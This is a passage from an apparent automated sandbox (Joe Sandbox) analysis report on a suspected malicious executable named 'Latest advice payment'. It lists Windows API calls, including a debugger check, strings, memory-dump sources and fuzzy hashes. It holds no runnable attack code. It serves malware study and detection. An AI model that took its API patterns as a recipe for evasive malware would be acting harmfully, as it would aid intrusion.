                                                            • Instruction Fuzzy Hash: 221100719007099FC710DF99D8C48DAFBF8FF18310B50856EE58AD7651D771AA48CB90
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ClassName_wcscmp
                                                            • String ID: #32770
                                                            • API String ID: 2292705959-463685578
                                                            • Opcode ID: f421950d56ea124cc50f16c3b94434ccdaf7b5e24af669979003f9dfd5775d9b
                                                            • Instruction ID: d929aecc96ea858b0e8542e0e653d47c2adc0ff98849c77bdf87078596b9d506
                                                            • Opcode Fuzzy Hash: f421950d56ea124cc50f16c3b94434ccdaf7b5e24af669979003f9dfd5775d9b
                                                            • Instruction Fuzzy Hash: 3EE092326002292AD720AA99AC49FE7FBACEB95B60F01016AFD04E7151D9709A458BE0
                                                            APIs
                                                              • Part of subcall function 0059B314: _memset.LIBCMT ref: 0059B321
                                                              • Part of subcall function 00580940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0059B2F0,?,?,?,0056100A), ref: 00580945
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,0056100A), ref: 0059B2F4
                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0056100A), ref: 0059B303
                                                            Strings
                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0059B2FE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                            • API String ID: 3158253471-631824599
                                                            • Opcode ID: 61105e1e103d42183c5234b07d3300dd83cbd01f594c669df2dd288ea6fea650
                                                            • Instruction ID: f5c10d480316192386751bf20cc1c9b33c0b87360729b7eacf09ae1e47f3af58
                                                            • Opcode Fuzzy Hash: 61105e1e103d42183c5234b07d3300dd83cbd01f594c669df2dd288ea6fea650
                                                            • Instruction Fuzzy Hash: 3EE06D702007428BEB64DF28EA083437EE4BF44714F008D6CE496C7280EBB4D448CBA1
                                                            APIs
                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 005B7C82
                                                              • Part of subcall function 00583358: _doexit.LIBCMT ref: 00583362
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Message_doexit
                                                            • String ID: AutoIt$Error allocating memory.
                                                            • API String ID: 1993061046-4017498283
                                                            • Opcode ID: 4dade29fb310fbdcf7045aee09975992ecfa2ffe49ab6e3ec05433a36b49ab45
                                                            • Instruction ID: 3d8ee78fa7ba0d490ac2d87d431b9088f7751031d8d8affebf72755952afc2a9
                                                            • Opcode Fuzzy Hash: 4dade29fb310fbdcf7045aee09975992ecfa2ffe49ab6e3ec05433a36b49ab45
                                                            • Instruction Fuzzy Hash: 2AD0C23238431832D20432A4AC0BBCA3E485B44B52F040415BF046A0D34DD1598042A8
                                                            APIs
                                                            • GetSystemDirectoryW.KERNEL32(?), ref: 005A1775
                                                              • Part of subcall function 005DBFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,005A195E,?), ref: 005DBFFE
                                                              • Part of subcall function 005DBFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 005DC010
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 005A196D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                            • String ID: WIN_XPe
                                                            • API String ID: 582185067-3257408948
                                                            APIs
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 005E596E
                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 005E5981
                                                              • Part of subcall function 005C5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 005C52BC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: FindMessagePostSleepWindow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 529655941-2988720461
                                                            APIs
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 005E59AE
                                                            • PostMessageW.USER32(00000000), ref: 005E59B5
                                                              • Part of subcall function 005C5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 005C52BC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: FindMessagePostSleepWindow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 529655941-2988720461